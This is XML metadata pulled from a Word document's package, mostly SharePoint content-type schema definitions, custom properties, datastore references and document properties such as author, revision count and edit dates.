        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214010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oundation.smc-qual.gcp.inovalon.global/" TargetMode="External"/><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5c6567a3-5597-45f0-a80c-4b07f33c1d1f" xsi:nil="true"/>
    <_ip_UnifiedCompliancePolicyUIAction xmlns="http://schemas.microsoft.com/sharepoint/v3" xsi:nil="true"/>
    <_Flow_SignoffStatus xmlns="5c6567a3-5597-45f0-a80c-4b07f33c1d1f" xsi:nil="true"/>
    <_ip_UnifiedCompliancePolicyProperties xmlns="http://schemas.microsoft.com/sharepoint/v3" xsi:nil="true"/>
    <Comments xmlns="5c6567a3-5597-45f0-a80c-4b07f33c1d1f" xsi:nil="true"/>
    <_dlc_DocId xmlns="ba014c23-7026-46aa-9f40-e22836c886ff">XXWH74S4FXZX-410280399-280980</_dlc_DocId>
    <_dlc_DocIdUrl xmlns="ba014c23-7026-46aa-9f40-e22836c886ff">
      <Url>https://inovalonglobal.sharepoint.com/sites/Technology/_layouts/15/DocIdRedir.aspx?ID=XXWH74S4FXZX-410280399-280980</Url>
      <Description>XXWH74S4FXZX-410280399-280980</Description>
    </_dlc_DocIdUrl>
    <TaxCatchAll xmlns="ba014c23-7026-46aa-9f40-e22836c886ff" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="5c6567a3-5597-45f0-a80c-4b07f33c1d1f">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <Clarification xmlns="5c6567a3-5597-45f0-a80c-4b07f33c1d1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41E87C4346AF4293830E4DA6A5EFF2" ma:contentTypeVersion="23" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="d9bd6de2ef8f8a2a986900ad598c2bdf">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="5c6567a3-5597-45f0-a80c-4b07f33c1d1f" xmlns:ns3="ba014c23-7026-46aa-9f40-e22836c886ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="5a83b0bd913bfff957a9815a1026f619" ns1:_="" ns2:_="" ns3:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="5c6567a3-5597-45f0-a80c-4b07f33c1d1f"/>
    <xsd:import namespace="ba014c23-7026-46aa-9f40-e22836c886f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2:Notes" minOccurs="0"/>
                <xsd:element ref="ns2:MediaServiceLocation" minOccurs="0"/>
                <xsd:element ref="ns2:_Flow_SignoffStatus" minOccurs="0"/>
                <xsd:element ref="ns3:_dlc_DocId" minOccurs="0"/>
                <xsd:element ref="ns3:_dlc_DocIdUrl" minOccurs="0"/>
                <xsd:element ref="ns3:_dlc_DocIdPersistId" minOccurs="0"/>
                <xsd:element ref="ns2:Comments" minOccurs="0"/>
                <xsd:element ref="ns2:MediaLengthInSeconds" minOccurs="0"/>
                <xsd:element ref="ns2:lcf76f155ced4ddcb4097134ff3c332f" minOccurs="0"/>
                <xsd:element ref="ns3:TaxCatchAll" minOccurs="0"/>
                <xsd:element ref="ns2:Clar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6567a3-5597-45f0-a80c-4b07f33c1d1f"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Notes" ma:index="21" nillable="true" ma:displayName="Notes" ma:format="Dropdown" ma:internalName="Notes">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Comments" ma:index="27" nillable="true" ma:displayName="Comments" ma:internalName="Comments">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text">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ccf53fd-c5c4-40d6-a514-56fab81c8fb5" ma:termSetId="09814cd3-568e-fe90-9814-8d621ff8fb84" ma:anchorId="fba54fb3-c3e1-fe81-a776-ca4b69148c4d" ma:open="true" ma:isKeyword="false">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element ref="pc:Terms" minOccurs="0" maxOccurs="1"/>
        </xsd:sequence>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="Clarification" ma:index="32" nillable="true" ma:displayName="Clarification" ma:description="state of requirements clarification" ma:format="Dropdown" ma:internalName="Clarification">
      <xsd:complexType>
        <xsd:complexContent>
          <xsd:extension base="dms:MultiChoice">
            <xsd:sequence>
              <xsd:element name="Value" maxOccurs="unbounded" minOccurs="0" nillable="true">
                <xsd:simpleType>
                  <xsd:restriction base="dms:Choice">
                    <xsd:enumeration value="100% Ready"/>
                    <xsd:enumeration value="Needs mockup"/>
                    <xsd:enumeration value="Can Start"/>
                    <xsd:enumeration value="Open Question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014c23-7026-46aa-9f40-e22836c886f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element name="TaxCatchAll" ma:index="31" nillable="true" ma:displayName="Taxonomy Catch All Column" ma:hidden="true" ma:list="{4805f1f9-1ca3-4631-bdd3-09efe9fb231d}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="ba014c23-7026-46aa-9f40-e22836c886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A68836-5BC1-428D-B46E-599EDBCB39AD}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{908AE896-D96F-48EC-8D8B-54867DBDE16A}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="5c6567a3-5597-45f0-a80c-4b07f33c1d1f"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3"/>
    <ds:schemaRef ds:uri="ba014c23-7026-46aa-9f40-e22836c886ff"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4D835EAF-ACC8-454E-AB86-1080E9FDB192}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3CCB3E29-F18E-4344-ABC0-3AB46F120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6567a3-5597-45f0-a80c-4b07f33c1d1f"/>
    <ds:schemaRef ds:uri="ba014c23-7026-46aa-9f40-e22836c88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AEC4402-065E-4B34-AA06-DCF85004224C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/events"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
<clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
  <clbl:label id="{a933ff6e-59f5-447a-9deb-9106d8231f33}" enabled="0" method="" siteId="{a933ff6e-59f5-447a-9deb-9106d8231f33}" removed="1"/>
</clbl:labelList>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <TotalTime>789</TotalTime>
  <Pages>48</Pages>
  <Words>9416</Words>
  <Characters>53675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Robinson</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michael Mancuso</cp:lastModifiedBy>
  <cp:revision>59</cp:revision>
  <cp:lastPrinted>2026-06-11T18:17:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-01T17:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-11T18:18:00Z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0x0101006541E87C4346AF4293830E4DA6A5EFF2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="AuthorIds_UIVersion_512">
    <vt:lpwstr>6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>5a9fbf37-6a78-4bb6-b990-561c90613f2b</vt:lpwstr>
  </property>
</Properties>
</file>